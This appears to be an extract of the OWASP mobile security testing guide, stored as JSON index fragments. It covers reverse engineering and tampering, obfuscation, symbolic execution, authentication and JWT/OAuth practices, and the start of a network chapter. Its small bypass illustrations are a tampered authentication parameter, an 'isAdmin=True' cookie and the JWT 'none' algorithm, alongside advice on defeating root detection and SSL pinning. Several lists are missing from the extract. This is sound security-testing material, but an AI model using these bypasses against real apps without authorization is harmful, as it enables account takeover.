Tampering is the process of changing a mobile app (either the compiled app or the running process) or its environment to affect its behavior. For example, an app might refuse to run on your rooted test device, making it impossible to run some of your tests. In such cases, you'll want to alter the app's behavior.
Mobile security testers are served well by understanding basic reverse engineering concepts. They should also know mobile devices and operating systems inside out: processor architecture, executable format, programming language intricacies, and so forth.
Reverse engineering is an art, and describing its every facet would fill a whole library. The sheer range of techniques and specializations is mind-blowing: one can spend years working on a very specific and isolated sub-problem, such as automating malware analysis or developing novel de-obfuscation methods. Security testers are generalists; to be effective reverse engineers, they must filter through the vast amount of relevant information.
There is no generic reverse engineering process that always works. That said, we'll describe commonly used methods and tools later in this guide, and give examples of tackling the most common defenses.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#why-you-need-it","title":"Why You Need It","text":"Mobile security testing requires at least basic reverse engineering skills for several reasons:
1. To enable black-box testing of mobile apps. Modern apps often include controls that will hinder dynamic analysis. SSL pinning and end-to-end (E2E) encryption sometimes prevent you from intercepting or manipulating traffic with a proxy. Root detection could prevent the app from running on a rooted device, preventing you from using advanced testing tools. You must be able to deactivate these defenses.
2. To enhance static analysis in black-box security testing. In a black-box test, static analysis of the app bytecode or binary code helps you understand the internal logic of the app. It also allows you to identify flaws such as hardcoded credentials.
3. To assess resilience against reverse engineering. Apps that implement the software protection measures listed in the Mobile Application Security Verification Standard Anti-Reversing Controls (MASVS-R) should withstand reverse engineering to a certain degree. To verify the effectiveness of such controls, the tester may perform a resilience assessment as part of the general security test. For the resilience assessment, the tester assumes the role of the reverse engineer and attempts to bypass defenses.
Before we dive into the world of mobile app reversing, we have some good news and some bad news. Let's start with the good news:
Ultimately, the reverse engineer always wins.
This is particularly true in the mobile industry, where the reverse engineer has a natural advantage: the way mobile apps are deployed and sandboxed is by design more restrictive than the deployment and sandboxing of classical Desktop apps, so including the rootkit-like defensive mechanisms often found in Windows software (e.g., DRM systems) is simply not feasible. The openness of Android allows reverse engineers to make favorable changes to the operating system, aiding the reverse engineering process. iOS gives reverse engineers less control, but defensive options are also more limited.
The bad news is that dealing with multi-threaded anti-debugging controls, cryptographic white-boxes, stealthy anti-tampering features, and highly complex control flow transformations is not for the faint-hearted. The most effective software protection schemes are proprietary and won't be beaten with standard tweaks and tricks. Defeating them requires tedious manual analysis, coding, frustration and, depending on your personality, sleepless nights and strained relationships.
It's easy for beginners to get overwhelmed by the sheer scope of reversing. The best way to get started is to set up some basic tools (see the relevant sections in the Android and iOS reversing chapters) and start with simple reversing tasks and crackmes. You'll need to learn about the assembler/bytecode language, the operating system, obfuscations you encounter, and so on. Start with simple tasks and gradually level up to more difficult ones.
In the following section, we'll give an overview of the techniques most commonly used in mobile app security testing. In later chapters, we'll drill down into OS-specific details of both Android and iOS.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#basic-tampering-techniques","title":"Basic Tampering Techniques","text":""},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#binary-patching","title":"Binary Patching","text":"Patching is the process of changing the compiled app, e.g., changing code in binary executables, modifying Java bytecode, or tampering with resources. This process is known as modding in the mobile game hacking scene. Patches can be applied in many ways, including editing binary files in a hex editor and decompiling, editing, and re-assembling an app. We'll give detailed examples of useful patches in later chapters.
Keep in mind that modern mobile operating systems strictly enforce code signing, so running modified apps is not as straightforward as it used to be in desktop environments. Security experts had a much easier life in the 90s! Fortunately, patching is not very difficult if you work on your own device. You simply have to re-sign the app or disable the default code signature verification facilities to run modified code.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#code-injection","title":"Code Injection","text":"Code injection is a very powerful technique that allows you to explore and modify processes at runtime. Injection can be implemented in various ways, but you'll get by without knowing all the details thanks to freely available, well-documented tools that automate the process. These tools give you direct access to process memory and important structures such as live objects instantiated by the app. They come with many utility functions that are useful for resolving loaded libraries, hooking methods and native functions, and more. Process memory tampering is more difficult to detect than file patching, so it is the preferred method in most cases.
Substrate, Frida, and Xposed are the most widely used hooking and code injection frameworks in the mobile industry. The three frameworks differ in design philosophy and implementation details: Substrate and Xposed focus on code injection and/or hooking, while Frida aims to be a full-blown \"dynamic instrumentation framework\", incorporating code injection, language bindings, and an injectable JavaScript VM and console.
However, you can also instrument apps with Substrate by using it to inject Cycript, the programming environment (aka \"Cycript-to-JavaScript\" compiler) authored by Saurik of Cydia fame. To complicate things even more, Frida's authors also created a fork of Cycript called \"frida-cycript\". It replaces Cycript's runtime with a Frida-based runtime called Mj\u00f8lner. This enables Cycript to run on all the platforms and architectures maintained by frida-core (if you are confused at this point, don't worry). The release of frida-cycript was accompanied by a blog post by Frida's developer Ole titled \"Cycript on Steroids\", a title that Saurik wasn't very fond of.
We'll include examples of all three frameworks. We recommend starting with Frida because it is the most versatile of the three (for this reason, we'll also include more Frida details and examples). Notably, Frida can inject a JavaScript VM into a process on both Android and iOS, while Cycript injection with Substrate only works on iOS. Ultimately, however, you can of course achieve many of the same goals with either framework.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#static-and-dynamic-binary-analysis","title":"Static and Dynamic Binary Analysis","text":"Reverse engineering is the process of reconstructing the semantics of a compiled program's source code. In other words, you take the program apart, run it, simulate parts of it, and do other unspeakable things to it to understand what it does and how.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#using-disassemblers-and-decompilers","title":"Using Disassemblers and Decompilers","text":"Disassemblers and decompilers allow you to translate an app's binary code or bytecode back into a more or less understandable format. By using these tools on native binaries, you can obtain assembler code that matches the architecture the app was compiled for. Disassemblers convert machine code to assembly code which in turn is used by decompilers to generate equivalent high-level language code. Android Java apps can be disassembled to smali, which is an assembly language for the DEX format used by Dalvik, Android's Java VM. Smali assembly can also be quite easily decompiled back to equivalent Java code.
In theory, the mapping between assembly and machine code should be one-to-one, and therefore it may give the impression that disassembling is a simple task. But in practice, there are multiple pitfalls such as:
Similarly, decompilation is a very complicated process, involving many deterministic and heuristic based approaches. As a consequence, decompilation is usually not really accurate, but nevertheless very helpful in getting a quick understanding of the function being analyzed. The accuracy of decompilation depends on the amount of information available in the code being decompiled and the sophistication of the decompiler. In addition, many compilation and post-compilation tools introduce additional complexity to the compiled code in order to increase the difficulty of comprehension and/or even decompilation itself. Such code is referred to as obfuscated code.
Over the past decades many tools have perfected the process of disassembly and decompilation, producing output with high fidelity. Advanced usage instructions for any of the available tools can often easily fill a book of their own. The best way to get started is to simply pick up a tool that fits your needs and budget and get a well-reviewed user guide. In this section, we will provide an introduction to some of those tools and in the subsequent \"Reverse Engineering and Tampering\" Android and iOS chapters we'll focus on the techniques themselves, especially those that are specific to the platform at hand.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#obfuscation","title":"Obfuscation","text":"Obfuscation is the process of transforming code and data to make it more difficult to comprehend (and sometimes even difficult to disassemble). It is usually an integral part of the software protection scheme. Obfuscation isn't something that can be simply turned on or off, programs can be made incomprehensible, in whole or in part, in many ways and to different degrees.
Note: All presented techniques below will not stop someone with enough time and budget from reverse engineering your app. However, combining these techniques will make their job significantly harder. The aim is thus to discourage reverse engineers from performing further analysis and not making it worth the effort.
The following techniques can be used to obfuscate an application:
The standard compiler generates binary symbols based on class and function names from the source code. Therefore, if no obfuscation is applied, symbol names remain meaningful and can easily be extracted from the app binary. For instance, a function which detects a jailbreak can be located by searching for relevant keywords (e.g. \"jailbreak\"). The listing below shows the disassembled function JailbreakDetectionViewController.jailbreakTest4Tapped
from the Damn Vulnerable iOS App (DVIA-v2).
__T07DVIA_v232JailbreakDetectionViewControllerC20jailbreakTest4TappedyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
After the obfuscation we can observe that the symbol\u2019s name is no longer meaningful as shown on the listing below.
__T07DVIA_v232zNNtWKQptikYUBNBgfFVMjSkvRdhhnbyyFySbyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
Nevertheless, this only applies to the names of functions, classes and fields. The actual code remains unmodified, so an attacker can still read the disassembled version of the function and try to understand its purpose (e.g. to retrieve the logic of a security algorithm).
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#instruction-substitution","title":"Instruction Substitution","text":"This technique replaces standard binary operators like addition or subtraction with more complex representations. For example, an addition x = a + b
can be represented as x = -(-a) - (-b)
. However, using the same replacement representation could be easily reversed, so it is recommended to add multiple substitution techniques for a single case and introduce a random factor. This technique can be reversed during decompilation, but depending on the complexity and depth of the substitutions, reversing it can still be time consuming.
Control flow flattening replaces original code with a more complex representation. The transformation breaks the body of a function into basic blocks and puts them all inside a single infinite loop with a switch statement that controls the program flow. This makes the program flow significantly harder to follow because it removes the natural conditional constructs that usually make the code easier to read.
The image shows how control flow flattening alters code. See \"Obfuscating C++ programs via control flow flattening\" for more information.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#dead-code-injection","title":"Dead Code Injection","text":"This technique makes the program's control flow more complex by injecting dead code into the program. Dead code is a stub of code that doesn\u2019t affect the original program\u2019s behavior but increases the overhead of the reverse engineering process.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#string-encryption","title":"String Encryption","text":"Applications are often compiled with hardcoded keys, licences, tokens and endpoint URLs. By default, all of them are stored in plaintext in the data section of an application\u2019s binary. This technique encrypts these values and injects stubs of code into the program that will decrypt that data before it is used by the program.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#packing","title":"Packing","text":"Packing is a dynamic rewriting obfuscation technique which compresses or encrypts the original executable into data and dynamically recovers it during execution. Packing an executable changes the file signature in an attempt to avoid signature-based detection.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#debugging-and-tracing","title":"Debugging and Tracing","text":"In the traditional sense, debugging is the process of identifying and isolating problems in a program as part of the software development life cycle. The same tools used for debugging are valuable to reverse engineers even when identifying bugs is not the primary goal. Debuggers enable program suspension at any point during runtime, inspection of the process' internal state, and even register and memory modification. These abilities simplify program inspection.
Debugging usually means interactive debugging sessions in which a debugger is attached to the running process. In contrast, tracing refers to passive logging of information about the app's execution (such as API calls). Tracing can be done in several ways, including debugging APIs, function hooks, and Kernel tracing facilities. Again, we'll cover many of these techniques in the OS-specific \"Reverse Engineering and Tampering\" chapters.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#advanced-techniques","title":"Advanced Techniques","text":"For more complicated tasks, such as de-obfuscating heavily obfuscated binaries, you won't get far without automating certain parts of the analysis. For example, understanding and simplifying a complex control flow graph based on manual analysis in the disassembler would take you years (and most likely drive you mad long before you're done). Instead, you can augment your workflow with custom made tools. Fortunately, modern disassemblers come with scripting and extension APIs, and many useful extensions are available for popular disassemblers. There are also open source disassembling engines and binary analysis frameworks.
As always in hacking, the anything-goes rule applies: simply use whatever is most efficient. Every binary is different, and all reverse engineers have their own style. Often, the best way to achieve your goal is to combine approaches (such as emulator-based tracing and symbolic execution). To get started, pick a good disassembler and/or reverse engineering framework, then get comfortable with their particular features and extension APIs. Ultimately, the best way to get better is to get hands-on experience.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#dynamic-binary-instrumentation","title":"Dynamic Binary Instrumentation","text":"Another useful approach for native binaries is dynamic binary instrumentations (DBI). Instrumentation frameworks such as Valgrind and PIN support fine-grained instruction-level tracing of single processes. This is accomplished by inserting dynamically generated code at runtime. Valgrind compiles fine on Android, and pre-built binaries are available for download.
The Valgrind README includes specific compilation instructions for Android.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#emulation-based-dynamic-analysis","title":"Emulation-based Dynamic Analysis","text":"Emulation is an imitation of a certain computer platform or program being executed in different platform or within another program. The software or hardware performing this imitation is called an emulator. Emulators provide a much cheaper alternative to an actual device, where a user can manipulate it without worrying about damaging the device. There are multiple emulators available for Android, but for iOS there are practically no viable emulators available. iOS only has a simulator, shipped within Xcode.
The difference between a simulator and an emulator often causes confusion and leads to the two terms being used interchangeably, but in reality they are different, especially for the iOS use case. An emulator mimics both the software and hardware environment of a targeted platform. On the other hand, a simulator only mimics the software environment.
QEMU based emulators for Android take into consideration the RAM, CPU, battery performance etc (hardware components) while running an application, but in an iOS simulator this hardware component behaviour is not taken into consideration at all. The iOS simulator even lacks the implementation of the iOS kernel, as a result if an application is using syscalls it cannot be executed in this simulator.
In simple words, an emulator is a much closer imitation of the targeted platform, while a simulator mimics only a part of it.
Running an app in the emulator gives you powerful ways to monitor and manipulate its environment. For some reverse engineering tasks, especially those that require low-level instruction tracing, emulation is the best (or only) choice. Unfortunately, this type of analysis is only viable for Android, because no free or open source emulator exists for iOS (the iOS simulator is not an emulator, and apps compiled for an iOS device don't run on it). The only iOS emulator available is a commercial SaaS solution - Corellium. We'll provide an overview of popular emulation-based analysis frameworks for Android in the \"Tampering and Reverse Engineering on Android\" chapter.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#custom-tooling-with-reverse-engineering-frameworks","title":"Custom Tooling with Reverse Engineering Frameworks","text":"Even though most professional GUI-based disassemblers feature scripting facilities and extensibility, they are simply not well-suited to solving particular problems. Reverse engineering frameworks allow you to perform and automate any kind of reversing task without depending on a heavy-weight GUI. Notably, most reversing frameworks are open source and/or available for free. Popular frameworks with support for mobile architectures include radare2 and Angr.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#example-program-analysis-with-symbolicconcolic-execution","title":"Example: Program Analysis with Symbolic/Concolic Execution","text":"In the late 2000s, testing based on symbolic execution has become a popular way to identify security vulnerabilities. Symbolic \"execution\" actually refers to the process of representing possible paths through a program as formulas in first-order logic. Satisfiability Modulo Theories (SMT) solvers are used to check the satisfiability of these formulas and provide solutions, including concrete values of the variables needed to reach a certain point of execution on the path corresponding to the solved formula.
In simple words, symbolic execution is mathematically analyzing a program without executing it. During analysis, each unknown input is represented as a mathematical variable (a symbolic value), and hence all the operations performed on these variables are recorded as a tree of operations (aka. AST (abstract syntax tree), from compiler theory). These ASTs can be translated into so-called constraints that will be interpreted by a SMT solver. In the end of this analysis, a final mathematical equation is obtained, in which the variables are the inputs whose values are not known. SMT solvers are special programs which solve these equations to give possible values for the input variables given a final state.
To illustrate this, imagine a function which takes one input (x
) and multiplies it by the value of a second input (y
). Finally, there is an if condition which checks if the value calculated is greater than the value of an external variable(z
), and returns \"success\" if true, else returns \"fail\". The equation for this operation will be (x * y) > z
.
If we want the function to always return \"success\" (final state), we can tell the SMT solver to calculate the values for x
and y
(input variables) which satisfy the corresponding equation. As is the case for global variables, their value can be changed from outside this function, which may lead to different outputs whenever this function is executed. This adds additional complexity to determining the correct solution.
Internally, SMT solvers use various equation-solving techniques to generate solutions for such equations. Some of the techniques are very advanced and their discussion is beyond the scope of this book.
In a real world situation, the functions are much more complex than the above example. The increased complexity of the functions can pose significant challenges for classical symbolic execution. Some of the challenges are summarised below:
To overcome these challenges, typically, symbolic execution is combined with other techniques such as dynamic execution (also called concrete execution) to mitigate the path explosion problem specific to classical symbolic execution. This combination of concrete (actual) and symbolic execution is referred to as concolic execution\u00a0(the name concolic stems from concrete and symbolic), sometimes also called as dynamic symbolic execution.
To visualize this, in the above example, we can obtain the value of the external variable by performing further reverse engineering or by dynamically executing the program and feeding this information into our symbolic execution analysis. This extra information will reduce the complexity of our equations and may produce more accurate analysis results. Together with improved SMT solvers and current hardware speeds, concolic execution allows to explore paths in medium-size software modules (i.e., on the order of 10 KLOC).
In addition, symbolic execution also comes in handy for supporting de-obfuscation tasks, such as simplifying control flow graphs. For example, Jonathan Salwan and Romain Thomas have shown how to reverse engineer VM-based software protections using Dynamic Symbolic Execution [#salwan] (i.e., using a mix of actual execution traces, simulation, and symbolic execution).
In the Android section, you'll find a walkthrough for cracking a simple license check in an Android application using symbolic execution.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#references","title":"References","text":"Authentication and authorization problems are prevalent security vulnerabilities. In fact, they consistently rank second highest in the OWASP Top 10.
Most mobile apps implement some kind of user authentication. Even though part of the authentication and state management logic is performed by the backend service, authentication is such an integral part of most mobile app architectures that understanding its common implementations is important.
Since the basic concepts are identical on iOS and Android, we'll discuss prevalent authentication and authorization architectures and pitfalls in this generic guide. OS-specific authentication issues, such as local and biometric authentication, will be discussed in the respective OS-specific chapters.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#general-assumptions","title":"General Assumptions","text":""},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#appropriate-authentication-is-in-place","title":"Appropriate Authentication is in Place","text":"Perform the following steps when testing authentication and authorization:
Authentication bypass vulnerabilities exist when authentication state is not consistently enforced on the server and when the client can tamper with the state. While the backend service is processing requests from the mobile client, it must consistently enforce authorization checks: verifying that the user is logged in and authorized every time a resource is requested.
Consider the following example from the OWASP Web Testing Guide. In the example, a web resource is accessed through a URL, and the authentication state is passed through a GET parameter:
http://www.site.com/page.asp?authenticated=no\n
The client can arbitrarily change the GET parameters sent with the request. Nothing prevents the client from simply changing the value of the authenticated
parameter to \"yes\", effectively bypassing authentication.
Although this is a simplistic example that you probably won't find in the wild, programmers sometimes rely on \"hidden\" client-side parameters, such as cookies, to maintain authentication state. They assume that these parameters can't be tampered with. Consider, for example, the following classic vulnerability in Nortel Contact Center Manager. The administrative web application of Nortel's appliance relied on the cookie \"isAdmin\" to determine whether the logged-in user should be granted administrative privileges. Consequently, it was possible to get admin access by simply setting the cookie value as follows:
isAdmin=True\n
Security experts used to recommend using session-based authentication and maintaining session data on the server only. This prevents any form of client-side tampering with the session state. However, the whole point of using stateless authentication instead of session-based authentication is to not have session state on the server. Instead, state is stored in client-side tokens and transmitted with every request. In this case, seeing client-side parameters such as isAdmin
is perfectly normal.
To prevent tampering, cryptographic signatures are added to client-side tokens. Of course, things may go wrong, and popular implementations of stateless authentication have been vulnerable to attacks. For example, the signature verification of some JSON Web Token (JWT) implementations could be deactivated by setting the signature type to \"None\".
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#best-practices-for-passwords","title":"Best Practices for Passwords","text":"Password strength is a key concern when passwords are used for authentication. The password policy defines requirements to which end users should adhere. A password policy typically specifies password length, password complexity, and password topologies. A \"strong\" password policy makes manual or automated password cracking difficult or impossible. For further information please consult the OWASP Authentication Cheat Sheet.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#general-guidelines-on-testing-authentication","title":"General Guidelines on Testing Authentication","text":"There's no one-size-fits-all approach to authentication. When reviewing the authentication architecture of an app, you should first consider whether the authentication method(s) used are appropriate in the given context. Authentication can be based on one or more of the following:
The number of authentication procedures implemented by mobile apps depends on the sensitivity of the functions or accessed resources. Refer to industry best practices when reviewing authentication functions. Username/password authentication (combined with a reasonable password policy) is generally considered sufficient for apps that have a user login and aren't very sensitive. This form of authentication is used by most social media apps.
For sensitive apps, adding a second authentication factor is usually appropriate. This includes apps that provide access to very sensitive information (such as credit card numbers) or allow users to transfer funds. In some industries, these apps must also comply with certain standards. For example, financial apps have to ensure compliance with the Payment Card Industry Data Security Standard (PCI DSS), the Gramm Leach Bliley Act, and the Sarbanes-Oxley Act (SOX). Compliance considerations for the US health care sector include the Health Insurance Portability and Accountability Act (HIPAA) and the Patient Safety Rule.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#stateful-vs-stateless-authentication","title":"Stateful vs. Stateless Authentication","text":"You'll usually find that the mobile app uses HTTP as the transport layer. The HTTP protocol itself is stateless, so there must be a way to associate a user's subsequent HTTP requests with that user. Otherwise, the user's login credentials would have to be sent with every request. Also, both the server and client need to keep track of user data (e.g., the user's privileges or role). This can be done in two different ways:
With stateful authentication, a unique session id is generated when the user logs in. In subsequent requests, this session ID serves as a reference to the user details stored on the server. The session ID is opaque; it doesn't contain any user data.
With stateless authentication, all user-identifying information is stored in a client-side token. The token can be passed to any server or micro service, eliminating the need to maintain session state on the server. Stateless authentication is often factored out to an authorization server, which produces, signs, and optionally encrypts the token upon user login.
Web applications commonly use stateful authentication with a random session ID that is stored in a client-side cookie. Although mobile apps sometimes use stateful sessions in a similar fashion, stateless token-based approaches are becoming popular for a variety of reasons:
As a mobile security tester, you should be familiar with both types of authentication.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#stateful-authentication","title":"Stateful Authentication","text":"Stateful (or \"session-based\") authentication is characterized by authentication records on both the client and server. The authentication flow is as follows:
When sessions are improperly managed, they are vulnerable to a variety of attacks that may compromise the session of a legitimate user, allowing the attacker to impersonate the user. This may result in lost data, compromised confidentiality, and illegitimate actions.
Best Practices:
Locate any server-side endpoints that provide sensitive information or functions and verify the consistent enforcement of authorization. The backend service must verify the user's session ID or token and make sure that the user has sufficient privileges to access the resource. If the session ID or token is missing or invalid, the request must be rejected.
Make sure that:
Authentication shouldn't be implemented from scratch but built on top of proven frameworks. Many popular frameworks provide ready-made authentication and session management functionality. If the app uses framework APIs for authentication, check the framework security documentation for best practices. Security guides for common frameworks are available at the following links:
A great resource for testing server-side authentication is the OWASP Web Testing Guide, specifically the Testing Authentication and Testing Session Management chapters.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#stateless-authentication","title":"Stateless Authentication","text":"Token-based authentication is implemented by sending a signed token (verified by the server) with each HTTP request. The most commonly used token format is the JSON Web Token, defined in RFC7519. A JWT may encode the complete session state as a JSON object. Therefore, the server doesn't have to store any session data or authentication information.
JWT tokens consist of three Base64Url-encoded parts separated by dots. The Token structure is as follows:
base64UrlEncode(header).base64UrlEncode(payload).base64UrlEncode(signature)\n
The following example shows a Base64Url-encoded JSON Web Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6Ikpva\nG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ\n
The header typically consists of two parts: the token type, which is JWT, and the hashing algorithm being used to compute the signature. In the example above, the header decodes as follows:
{\"alg\":\"HS256\",\"typ\":\"JWT\"}\n
The second part of the token is the payload, which contains so-called claims. Claims are statements about an entity (typically, the user) and additional metadata. For example:
{\"sub\":\"1234567890\",\"name\":\"John Doe\",\"admin\":true}\n
The signature is created by applying the algorithm specified in the JWT header to the encoded header, encoded payload, and a secret value. For example, when using the HMAC SHA256 algorithm the signature is created in the following way:
HMACSHA256(base64UrlEncode(header) + \".\" + base64UrlEncode(payload), secret)\n
Note that the secret is shared between the authentication server and the backend service - the client does not know it. This proves that the token was obtained from a legitimate authentication service. It also prevents the client from tampering with the claims contained in the token.
Best Practices:
Verify that the implementation adheres to JWT best practices:
jti
(JWT ID) claim, which gives the JWT a unique identifier.aud
(audience) claim, which defines for which application the token is entitled.none
, indicating that \"the integrity of the token has already been verified\". Some libraries might treat tokens signed with the none
algorithm as if they were valid tokens with verified signatures, so the application will trust altered token claims.There are two different Burp Plugins that can help you for testing the vulnerabilities listed above:
Also, make sure to check out the OWASP JWT Cheat Sheet for additional information.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#oauth-20","title":"OAuth 2.0","text":"OAuth 2.0 is an authorization framework that enables third-party applications to obtain limited access to user accounts on remote HTTP services such as APIs and web-enabled applications.
Common uses for OAuth2 include:
According to OAuth 2.0, a mobile client seeking access to a user's resources must first ask the user to authenticate against an authentication server. With the users' approval, the authorization server then issues a token that allows the app to act on behalf of the user. Note that the OAuth2 specification doesn't define any particular kind of authentication or access token format.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#protocol-overview","title":"Protocol Overview","text":"OAuth 2.0 defines four roles:
Note: The API fulfills both the Resource Server and Authorization Server roles. Therefore, we will refer to both as the API.
Here is a more detailed explanation of the steps in the diagram:
In OAuth2, the user agent is the entity that performs the authentication. OAuth2 authentication can be performed either through an external user agent (e.g. Chrome or Safari) or in the app itself (e.g. through a WebView embedded into the app or an authentication library). None of the two modes is intrinsically \"better\" than the other. The choice depends on the app's specific use case and threat model.
External User Agent: Using an external user agent is the method of choice for apps that need to interact with social media accounts (Facebook, Twitter, etc.). Advantages of this method include:
On the negative side, there is no way to control the behavior of the browser (e.g. to activate certificate pinning).
Embedded User Agent: Using an embedded user agent is the method of choice for apps that need to operate within a closed ecosystem, for example to interact with corporate accounts. For example, consider a banking app that uses OAuth2 to retrieve an access token from the bank's authentication server, which is then used to access a number of micro services. In that case, credential phishing is not a viable scenario. It is likely preferable to keep the authentication process in the (hopefully) carefully secured banking app, instead of placing trust on external components.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#best-practices","title":"Best Practices","text":"For additional best practices and detailed information please refer to the following source documents:
Some of the best practices include but are not limited to:
Failing to destroy the server-side session is one of the most common logout functionality implementation errors. This error keeps the session or token alive, even after the user logs out of the application. An attacker who gets valid authentication information can continue to use it and hijack a user's account.
Many mobile apps don't automatically log users out. There can be various reasons, such as: because it is inconvenient for customers, or because of decisions made when implementing stateless authentication. The application should still have a logout function, and it should be implemented according to best practices, destroying all locally stored tokens or session identifiers.
If session information is stored on the server, it should be destroyed by sending a logout request to that server. In case of a high-risk application, tokens should be invalidated. Not removing tokens or session identifiers can result in unauthorized access to the application in case the tokens are leaked. Note that other sensitive types of information should be removed as well, as any information that is not properly cleared may be leaked later, for example during a device backup.
Here are different examples of session termination for proper server-side logout:
If access and refresh tokens are used with stateless authentication, they should be deleted from the mobile device. The refresh token should be invalidated on the server.
The OWASP Web Testing Guide (WSTG-SESS-06) includes a detailed explanation and more test cases.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#supplementary-authentication","title":"Supplementary Authentication","text":"Authentication schemes are sometimes supplemented by passive contextual authentication, which can incorporate:
Ideally, in such a system the user's context is compared to previously recorded data to identify anomalies that might indicate account abuse or potential fraud. This process is transparent to the user, but can become a powerful deterrent to attackers.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#two-factor-authentication","title":"Two-factor Authentication","text":"Two-factor authentication (2FA) is standard for apps that allow users to access sensitive functions and data. Common implementations use a password for the first factor and any of the following as the second factor:
Whatever option is used, it always must be enforced and verified on the server-side and never on client-side. Otherwise the 2FA can be easily bypassed within the app.
The 2FA can be performed at login or later in the user's session.
For example, after logging in to a banking app with a username and PIN, the user is authorized to perform non-sensitive tasks. Once the user attempts to execute a bank transfer, the second factor (\"step-up authentication\") must be presented.
Best Practices:
Although one-time passwords (OTP) sent via SMS are a common second factor for two-factor authentication, this method has its shortcomings. In 2016, NIST suggested: \"Due to the risk that SMS messages may be intercepted or redirected, implementers of new systems SHOULD carefully consider alternative authenticators.\". Below you will find a list of some related threats and suggestions to avoid successful attacks on SMS-OTP.
Threats:
You can find below several suggestions to reduce the likelihood of exploitation when using SMS for OTP:
SMS-OTP Research:
Another alternative and strong mechanism to implement a second factor is transaction signing.
Transaction signing requires authentication of the user's approval of critical transactions. Asymmetric cryptography is the best way to implement transaction signing. The app will generate a public/private key pair when the user signs up, then register the public key on the backend. The private key is securely stored in the KeyStore (Android) or KeyChain (iOS). To authorize a transaction, the backend sends the mobile app a push notification containing the transaction data. The user is then asked to confirm or deny the transaction. After confirmation, the user is prompted to unlock the Keychain (by entering the PIN or fingerprint), and the data is signed with the user's private key. The signed transaction is then sent to the server, which verifies the signature with the user's public key.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#login-activity-and-device-blocking","title":"Login Activity and Device Blocking","text":"It is a best practice that apps should inform the user about all login activities within the app with the possibility of blocking certain devices. This can be broken down into various scenarios:
The developer can make use of specific meta-information and associate it to each different activity or event within the application. This will make it easier for the user to spot suspicious behavior and block the corresponding device. The meta-information may include:
The application can provide a list of activities history which will be updated after each sensitive activity within the application. The choice of which activities to audit needs to be done for each application based on the data it handles and the level of security risk the team is willing to have. Below is a list of common sensitive activities that are usually audited:
Paid content requires special care, and additional meta-information (e.g., operation cost, credit, etc.) might be used to ensure the user's knowledge about the whole operation's parameters.
In addition, non-repudiation mechanisms should be applied to sensitive transactions (e.g. paid content access, given consent to Terms and Conditions clauses, etc.) in order to prove that a specific transaction was in fact performed (integrity) and by whom (authentication).
Lastly, it should be possible for the user to log out specific open sessions and in some cases it might be interesting to fully block certain devices using a device identifier.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/","title":"Mobile App Network Communication","text":"Practically every network-connected mobile app uses the Hypertext Transfer Protocol (HTTP) or HTTP over Transport Layer Security (TLS), HTTPS, to send and receive data to and from remote endpoints. Consequently, network-based attacks (such as packet sniffing and man-in-the-middle-attacks) are a problem. In this chapter we discuss potential vulnerabilities, testing techniques, and best practices concerning the network communication between mobile apps and their endpoints.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#secure-connections","title":"Secure Connections","text":"The time has long passed since it was reasonable to use cleartext HTTP alone and it's usually trivial to secure HTTP connections using HTTPS. HTTPS is essentially HTTP layered on top of another protocol known as Transport Layer Security (TLS). And TLS performs a handshake using public key cryptography and, when complete, creates a secure connection.
An HTTPS connection is considered secure because of three properties:
Certificate Authorities (CAs) are an integral part of a secure client server communication and they are predefined in the trust store of each operating system. For instance, on iOS there are more than 200 root certificates installed (see Apple documentation - Available trusted root certificates for Apple operating systems)
CAs can be added to the trust store, either manually by the user, by an MDM that manages the enterprise device or through malware. The question is then: \"can you trust all of those CAs and should your app rely on the default trust store?\". After all, there are well-known cases where certificate authorities have been compromised or tricked into issuing certificates to impostors. A detailed timeline of CA breaches and failures can be found at sslmate.com.
Both Android and iOS allow the user to install additional CAs or trust anchors.
An app may want to trust a custom set of CAs instead of the platform default. The most common reasons for this are:
